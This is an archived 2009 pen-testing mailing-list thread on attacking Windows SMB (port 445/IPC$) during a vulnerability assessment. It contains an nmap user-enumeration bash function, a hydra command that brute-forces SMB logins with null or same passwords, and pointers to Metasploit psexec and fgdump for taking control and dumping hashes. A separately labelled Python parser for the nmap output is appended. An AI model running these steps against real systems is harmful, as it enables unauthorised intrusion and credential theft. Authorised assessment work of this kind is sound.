Exploiting IPC$




I recommend SuperScan4, which runs on Windows.

http://www.foundstone.com/us/resources/proddesc/superscan.htm

I also use this bash script, which runs with Nmap version 5.00 or later in
BackTrack.


function nmapenumsmb
{
    # Usage check. 'return' rather than 'exit': the function is sourced from
    # ~/.bashrc, and 'exit' would close the interactive shell on a typo.
    if [ $# -eq 0 ]
    then
        echo -e "Sintaxis: nmapenumsmb <IP>"
        return 1
    fi

    # Run the smb-enum-* NSE scripts against 445/tcp and save every output format
    "$(which nmap)" -n -d -p445 --script='smb-enum*' -vv -oA "nmap.enum.$1" "$1"
    echo Getting users
    # Header for the filtered user list (one field per attribute nmap prints)
    echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source" > "nmap.enum.users.notdisabled.$1.csv"
    # For each 'Type: User' block keep the login line before it and the six
    # attribute lines after it, flatten each block to one ';'-separated line,
    # drop disabled accounts, keep only the values (odd fields after the split),
    # append enabled users to one CSV and the subset without machine accounts
    # (names ending in '$') to a second CSV
    grep -B1 -A6 -e 'Type: User' "nmap.enum.$1.nmap" | tee "nmap.enum.usuarios.$1.txt" \
        | tr -d '\n' | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \ //g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \
        | sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut -d\; -f1,3,5,7,9,11,13,15,17 \
        | grep \;User\; | tee -a "nmap.enum.users.notdisabled.$1.csv" \
        | grep -ve '\$' > "nmap.enum.users.notdisabled.notmachines.$1.csv"
}

You add it to your ~/.bashrc and run it as nmapenumsmb IP, and it generates
some pretty CSV files with the enumeration information.

Or just nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP

You can also use Cain from www.toxid.it to do the SID brute-force user
enumeration.

Then I use hydra to test the users for the same or a null password. It
always works. Then you can use SuperScan to find out who is Admin.

hydra -w 10 -V -L lst.users.1.per.line -es -o passwods.hydra.txt IP smbnt -m GROUP:Domain.com.mx -m D

If you get Admin, I recommend Metasploit with the smbpsexec module or
fgdump from foofus to get control/hashes of the machine. Have fun.


On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley@xxxxxxxxx> wrote:
Try the nmap scripts smb-enum-shares and smb-brute, always results =)

Halley


2009/12/29 Jerome Athias <jerome.athias@xxxxxxx>

scan/check for administrative shares
Admin$
C$

(you can find a ton of tools for this task)

then you can try a brute-force attack
https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar
THCHydra
...

RPC/DCOM sploits
Metasploit Framework

G00D L\_/CK
And Happy New Hacking Y3aR!

/JA

On 28/12/2009 12:11, Himanshu Goyal wrote:

Hello,

Can somebody share how to exploit port 445? I am doing a VA and found
port 445 open.

When I try to connect to IPC$, it says access denied.

Thanks

Cheers-
Himanshu


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification
Review Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.

http://www.iacertification.org

------------------------------------------------------------------------










--
Adrián Puente Z.
[www.hackarandas.com]
Where ideas scatter into bytes...

"... I beg my pride to always keep company with my prudence,
and if one day my prudence should take flight, may it at least
be able to fly together with my madness"
--Nietzsche

Fingerprint: FBD6 4C36 2557 C64C 1318 70A8 F561 CB6F 4E40 5AFB
http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz
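The sed/grep/cut pipeline in the bash function above is hard to read and silently breaks if nmap changes its indentation. As an added example that is not part of the original thread, here is the same extraction in Python: it parses the "Type: User" blocks from smb-enum-users output into records, drops disabled accounts and machine accounts (names ending in "$") exactly as the two grep filters do, and writes the same ";"-separated header. The sample scan output is constructed to mirror the nmap 5.x layout the pipeline expects (login line, then Type/Domain/RID/Full name/Description/Flags/Source); the precise layout of a real scan is an assumption, so the parser keys on the "Key: value" pairs rather than on column positions. The same parse is just as useful for an administrator checking what an anonymous SMB enumeration of their own host gives away.

```python
"""Parse nmap smb-enum-users output into records and filter them.

Added example, not code from the original thread. The sample text is a
constructed approximation of the 2009-era nmap smb-enum-users layout; the
parser relies only on the 'Key: value' pairs, not on column positions.
"""
import csv
import io
import re

# Field order matches the CSV header used in the posted bash function.
FIELDS = ["Login", "Type", "Domain", "RID", "Full Name", "Description", "Flags", "Source"]

# Attribute keys as nmap prints them, mapped to the CSV column names above.
KEY_MAP = {"Type": "Type", "Domain": "Domain", "RID": "RID", "Full name": "Full Name",
           "Description": "Description", "Flags": "Flags", "Source": "Source"}

# Strips the NSE tree prefix ('|  |    ', '|  |_ |_ ') from an output line.
LEADER = re.compile(r"^\|[ |_]*")

# Constructed sample in the shape of nmap 5.x smb-enum-users output.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|  smb-enum-users:
|  |  Administrator
|  |    Type: User
|  |    Domain: LAB
|  |    RID: 500
|  |    Full name:
|  |    Description: Built-in account for administering the computer/domain
|  |    Flags: Normal account, Password doesn't expire
|  |    Source: SAMR
|  |  Guest
|  |    Type: User
|  |    Domain: LAB
|  |    RID: 501
|  |    Full name:
|  |    Description: Built-in account for guest access
|  |    Flags: Account disabled, Normal account
|  |    Source: SAMR
|  |  WKSTN01$
|  |    Type: User
|  |    Domain: LAB
|  |    RID: 1105
|  |    Full name:
|  |    Description:
|  |    Flags: Normal account
|  |    Source: SAMR
|  |  Domain Users
|  |    Type: Group
|  |    Domain: LAB
|  |    RID: 513
|  |_ |_ Source: SAMR
"""


def parse_smb_enum_users(text):
    """Return one dict per account (keyed by FIELDS) found in the smb-enum-users block."""
    records = []
    current = None
    in_section = False
    for raw in text.splitlines():
        if not raw.startswith("|"):
            in_section = False  # left the NSE script-output tree
            continue
        line = LEADER.sub("", raw).strip()
        if line.startswith("smb-enum-users"):
            in_section = True
            continue
        if not in_section or not line:
            continue
        key, sep, value = line.partition(":")
        if sep and key in KEY_MAP:
            if current is not None:  # attribute line belongs to the last login seen
                current[KEY_MAP[key]] = value.strip()
        else:  # any other line inside the block starts a new account
            current = {f: "" for f in FIELDS}
            current["Login"] = line
            records.append(current)
    return records


def is_disabled(rec):
    """Equivalent of the 'grep -v "Account disabled"' filter."""
    return "Account disabled" in rec["Flags"]


def is_machine_account(rec):
    """Equivalent of the "grep -ve '\\$'" filter: computer accounts end in '$'."""
    return rec["Login"].endswith("$")


def enabled_users(records, include_machines=False):
    """Users (not groups) that are not disabled, optionally without machine accounts."""
    return [r for r in records
            if r["Type"] == "User" and not is_disabled(r)
            and (include_machines or not is_machine_account(r))]


def to_csv(records):
    """Render records with the same ';'-separated header the bash function writes."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, delimiter=";")
    writer.writeheader()
    writer.writerows(records)
    return buf.getvalue()


if __name__ == "__main__":
    accounts = parse_smb_enum_users(SAMPLE_NMAP_OUTPUT)
    print(to_csv(enabled_users(accounts)))
```

On the constructed sample this yields a single row for Administrator: Guest is dropped by the disabled-account filter and WKSTN01$ by the machine-account filter, while the group entry never passes the Type check.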



